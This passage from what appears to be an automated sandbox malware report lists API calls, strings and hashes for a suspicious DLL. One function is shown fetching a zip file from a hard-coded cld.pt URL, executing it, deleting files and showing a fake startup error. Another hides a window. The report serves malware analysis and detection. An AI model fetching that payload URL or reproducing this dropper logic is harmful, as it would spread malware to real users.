                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Open$QueryValue$CloseFileModuleName
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                    • API String ID: 2701450724-3496071916
                    • Opcode ID: 94724162d68979dd298383361c4cf5e4d982cf24c5fe59c564b5e6578fbad075
                    • Instruction ID: cbfae4a62b378cc28ea6e45c0bec81fcd311d52e43a94ea934a1adf2361445e9
                    • Opcode Fuzzy Hash: 94724162d68979dd298383361c4cf5e4d982cf24c5fe59c564b5e6578fbad075
                    • Instruction Fuzzy Hash: DD517771B4020ABEEB50D7A1DE49FEE73FCEB04704F604425B914F6A81D7749A049B66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB850 Relevance: 19.7, APIs: 8, Strings: 5, Instructions: 238sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 6C7E979C: CreateDirectoryW.KERNEL32(00000000,00000000,?,6C9DB9D7,6C9DBCE4,?,6C9DBCE4,?,?,00000003,00000000,6C9DBC16), ref: 6C7E97A9
                      • Part of subcall function 6C9DB2F4: GetUserNameW.ADVAPI32(00000000,00000400), ref: 6C9DB31E
                      • Part of subcall function 6C9DB784: GetSystemDefaultLangID.KERNEL32 ref: 6C9DB79A
                      • Part of subcall function 6C9DB784: VerLanguageNameW.KERNEL32(?,?,000000FA), ref: 6C9DB7B3
                      • Part of subcall function 6C9DB4D4: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6C9DB523
                      • Part of subcall function 6C9DB4D4: InternetOpenUrlW.WININET(?,00000000,00000000,00000000,00000000,00000000), ref: 6C9DB540
                      • Part of subcall function 6C9DB4D4: InternetReadFile.WININET(00000000,?,00000400,?), ref: 6C9DB58A
                      • Part of subcall function 6C9DB4D4: InternetCloseHandle.WININET(00000000), ref: 6C9DB5C8
                      • Part of subcall function 6C9DB4D4: InternetCloseHandle.WININET(?), ref: 6C9DB5D1
                    • Sleep.KERNEL32(000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?,6C9DBCE4,?,6C9DBCE4), ref: 6C9DBA55
                    • Sleep.KERNEL32(000000E9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?,6C9DBCE4,?), ref: 6C9DBA5F
                    • Sleep.KERNEL32(000000E9,00000000,000000E9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?), ref: 6C9DBA81
                    • Sleep.KERNEL32(0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?,6C9DBCE4), ref: 6C9DBA98
                    • Sleep.KERNEL32(0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?), ref: 6C9DBAA2
                    • Sleep.KERNEL32(00000F96,6C9DBCE4,?,0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?), ref: 6C9DBAF4
                    • Sleep.KERNEL32(000000E7,00000F96,6C9DBCE4,?,0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?), ref: 6C9DBAFE
                      • Part of subcall function 6C9DB600: ShellExecuteW.SHELL32(00000000,open,00000000,?,?,?), ref: 6C9DB6D1
                    • Sleep.KERNEL32(000000E8,6C9DBB86,?,6C9DBCE4,6C9DBCE4,?,000000E7,00000F96,6C9DBCE4,?,0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF), ref: 6C9DBB95
                      • Part of subcall function 6C9DB404: DeleteFileW.KERNEL32(00000000,00000000,6C9DB44C,?,00000000,6C9DB46E), ref: 6C9DB43D
                    Strings
                    • Error 0x0000007b The Application was unable to start correctly, xrefs: 6C9DB8A2
                    • Chin, xrefs: 6C9DB90F
                    • Jap, xrefs: 6C9DB8EC
                    • https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip, xrefs: 6C9DB853
                    • 6569, xrefs: 6C9DBA64
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep$Internet$CloseFileHandleNameOpen$CreateDefaultDeleteDirectoryExecuteLangLanguageReadShellSystemUser
                    • String ID: 6569$Chin$Error 0x0000007b The Application was unable to start correctly$Jap$https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip
                    • API String ID: 3771374485-2171053703
                    • Opcode ID: cffb3705339115505eadf5c51d4b1400ea5fe29651e9fae170b571bde7cf1a6c
                    • Instruction ID: 34e3077822253f2199be71b9fa421b86fb67e1031f2de8ee267895032e88994c
                    • Opcode Fuzzy Hash: cffb3705339115505eadf5c51d4b1400ea5fe29651e9fae170b571bde7cf1a6c
                    • Instruction Fuzzy Hash: 66914830A009099FDB11DBA4CE49ADEBBB9BF58708F528465E510B7F54DB30F9098B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF2CC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • EnterCriticalSection.KERNEL32(6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39,?,?,00000000,00000000,00000000), ref: 6C7CF2EA
                    • LeaveCriticalSection.KERNEL32(6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39,?,?,00000000,00000000), ref: 6C7CF30E
                    • LeaveCriticalSection.KERNEL32(6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39,?,?,00000000,00000000), ref: 6C7CF31D
                    • IsValidLocale.KERNEL32(00000000,00000002,6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39), ref: 6C7CF32F
                    • EnterCriticalSection.KERNEL32(6CD5DC14,00000000,00000002,6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39), ref: 6C7CF38C
                    • LeaveCriticalSection.KERNEL32(6CD5DC14,6CD5DC14,00000000,00000002,6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39), ref: 6C7CF3B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                    • String ID: en-GB,en,en-US,
                    • API String ID: 975949045-3021119265
                    • Opcode ID: 702ad9271b97ff8ec2dfea0919e50ccb2dac7c48e15c269349bdcf63e433d1f6
                    • Instruction ID: a46f5b0d613803fa063724ccc3d3a9f817b9c0b7c9fe02fbb5ce4b4c45067d58
                    • Opcode Fuzzy Hash: 702ad9271b97ff8ec2dfea0919e50ccb2dac7c48e15c269349bdcf63e433d1f6
                    • Instruction Fuzzy Hash: B721A520704517AFEB10A7B89B0D6AE32999B4E34CB904832A460DBF54CFB59D4893B7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E8CF8 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 240 6c7e8cf8-6c7e8d18 call 6c7cbab4 GetFileAttributesW 243 6c7e8d1a-6c7e8d20 240->243 244 6c7e8d96-6c7e8d9d 240->244 245 6c7e8d2d-6c7e8d31 243->245 246 6c7e8d22-6c7e8d2b 243->246 247 6c7e8d33-6c7e8d4e CreateFileW 245->247 248 6c7e8d61-6c7e8d67 245->248 246->244 247->244 249 6c7e8d50-6c7e8d5f CloseHandle 247->249 250 6c7e8d6d-6c7e8d88 CreateFileW 248->250 251 6c7e8d69-6c7e8d6b 248->251 249->244 252 6c7e8d8a-6c7e8d92 CloseHandle 250->252 253 6c7e8d94 250->253 251->244 252->244 253->244
                    APIs
                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,6C9DB993,6C9DBCE4,?,?,00000003,00000000,6C9DBC16), ref: 6C7E8D0E
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,6C9DB993,6C9DBCE4,?), ref: 6C7E8D46
                    • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,6C9DB993,6C9DBCE4), ref: 6C7E8D51
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: File$AttributesCloseCreateHandle
                    • String ID:
                    • API String ID: 4216088276-0
                    • Opcode ID: 5cd25c42511335ccadbfd4c047ec9eb1a6a081c3daaa287d8c24302a5c52f87b
                    • Instruction ID: 929dda3357e65b17815f7044d1e4610f15cbbf4b6e90c668bf22aa9c965f204d
                    • Opcode Fuzzy Hash: 5cd25c42511335ccadbfd4c047ec9eb1a6a081c3daaa287d8c24302a5c52f87b
                    • Instruction Fuzzy Hash: 9E01D433B8631879F630506C5F8AFAA21484B6F76CF320637BF68FBAC0C6D468455214
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB7D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 254 6c9db7d0-6c9db7fd FindWindowW 255 6c9db7ff-6c9db805 ShowWindow 254->255 256 6c9db80a-6c9db827 254->256 255->256
                    APIs
                    • FindWindowW.USER32(#32770,pdferror404), ref: 6C9DB7F1
                    • ShowWindow.USER32(00000000,00000000,00000000,6C9DB814), ref: 6C9DB805
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Window$FindShow
                    • String ID: #32770$pdferror404
                    • API String ID: 734913111-3799891402
                    • Opcode ID: 4a1ceec3b5266c66fbf80ec8b0d49fd3083454f376e01ab97d6682c17f61d927
                    • Instruction ID: fd82fcb3dad98dea6b53e42c674dd74fa130532aab16ddec4a076f263e3300a2
                    • Opcode Fuzzy Hash: 4a1ceec3b5266c66fbf80ec8b0d49fd3083454f376e01ab97d6682c17f61d927
                    • Instruction Fuzzy Hash: 59F0EC31508604BEE7114A95EC55E9E7BBCE785675F2388F6F400E3D80E631B540C574
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C8228 Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 258 6c7c8228-6c7c823d 259 6c7c823f-6c7c8242 258->259 260 6c7c8253-6c7c8256 258->260 261 6c7c8248-6c7c824d 259->261 262 6c7c82f3-6c7c82f8 259->262 263 6c7c825c-6c7c8278 260->263 264 6c7c82fa-6c7c82ff 260->264 261->260 265 6c7c830c call 6c7c72bc 261->265 262->265 266 6c7c82da-6c7c82e4 263->266 267 6c7c827a-6c7c8299 263->267 264->265 275 6c7c8311-6c7c8314 265->275 268 6c7c82ea 266->268 269 6c7c82e6-6c7c82e8 266->269 272 6c7c82bc-6c7c82cc CreateFileW 267->272 273 6c7c829b-6c7c82a1 267->273 274 6c7c82ec-6c7c82f1 GetStdHandle 268->274 269->274 277 6c7c82d1-6c7c82d4 272->277 273->272 276 6c7c82a3-6c7c82af 273->276 274->277 276->272 278 6c7c82b1-6c7c82b6 276->278 279 6c7c82d6-6c7c82d8 277->279 280 6c7c8301-6c7c8307 GetLastError 277->280 278->272 279->275 280->265
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,6C7C8322,6C9DB571,?,?,?,00000000), ref: 6C7C82CC
                    • GetStdHandle.KERNEL32(000000F5,?,?,?,6C7C8322,6C9DB571,?,?,?,00000000,6C9DB5F1), ref: 6C7C82EC
                    • GetLastError.KERNEL32(000000F5,?,?,?,6C7C8322,6C9DB571,?,?,?,00000000,6C9DB5F1), ref: 6C7C8307
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateErrorFileHandleLast
                    • String ID:
                    • API String ID: 1572049330-0
                    • Opcode ID: 1df164f0659a7271f8657a7cd0ec3761a52c84d1f9bc3d5d7ca13dd760ad1a26
                    • Instruction ID: 1632ce79710ba224135162be1b11dad44069978abb1aa4137f29f4f6bc1c5386
                    • Opcode Fuzzy Hash: 1df164f0659a7271f8657a7cd0ec3761a52c84d1f9bc3d5d7ca13dd760ad1a26
                    • Instruction Fuzzy Hash: 6C2127323019039EFB109F5C8B8D75A7A55DF86318F25D26BD9358FBA6E670C840839B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CFC20 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32(00000000,6C7CFD39,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6C7CFDC2,00000000,?,00000105), ref: 6C7CFCCB
                    • GetSystemDefaultUILanguage.KERNEL32(00000000,6C7CFD39,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6C7CFDC2,00000000,?,00000105), ref: 6C7CFCF3
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLanguage$SystemUser
                    • String ID:
                    • API String ID: 384301227-0
                    • Opcode ID: 07e0a5e0761ed18d036dcc5523a91c627f068904eec2627e1ecdb18800955139
                    • Instruction ID: 080aba785bf254d1a02e9634cefa345c5a3c2c363d33e85a089caade31a88845
                    • Opcode Fuzzy Hash: 07e0a5e0761ed18d036dcc5523a91c627f068904eec2627e1ecdb18800955139
                    • Instruction Fuzzy Hash: DB313030B0020B9FDB10DFA8CA99BDEB7B9EF45318F104966D410A7B50D774AE89CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CFD48 Relevance: 3.1, APIs: 2, Instructions: 56libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105,6C7C0000,6CD4EC54,6C7CEAF4), ref: 6C7CFD84
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105), ref: 6C7CFDD5
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName
                    • String ID:
                    • API String ID: 1159719554-0
                    • Opcode ID: 5f0ad7821e4fbf13679b5ae91b5e3b0427b81d92ceb32ffd5ff874ccb668ecec
                    • Instruction ID: 2561406674546f18c94d6b1dad483ee04787a7f5dd457b2798498c6b6bccf702
                    • Opcode Fuzzy Hash: 5f0ad7821e4fbf13679b5ae91b5e3b0427b81d92ceb32ffd5ff874ccb668ecec
                    • Instruction Fuzzy Hash: 34114230B4421D9FDB10DB50DE99BDEB3B8DB58704F1144A6E508E3790DB705F849AA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C801C Relevance: 3.1, APIs: 2, Instructions: 53fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 358 6c7c801c-6c7c8034 359 6c7c8036-6c7c804b WriteFile 358->359 360 6c7c8080-6c7c808a call 6c7c72bc 358->360 361 6c7c804d-6c7c8059 GetLastError call 6c7c72bc 359->361 362 6c7c805b-6c7c8067 359->362 369 6c7c808c-6c7c8091 360->369 361->369 365 6c7c8069-6c7c806e 362->365 366 6c7c8070-6c7c8072 362->366 365->369 366->369 370 6c7c8074-6c7c807e call 6c7c72bc 366->370 370->369
                    APIs
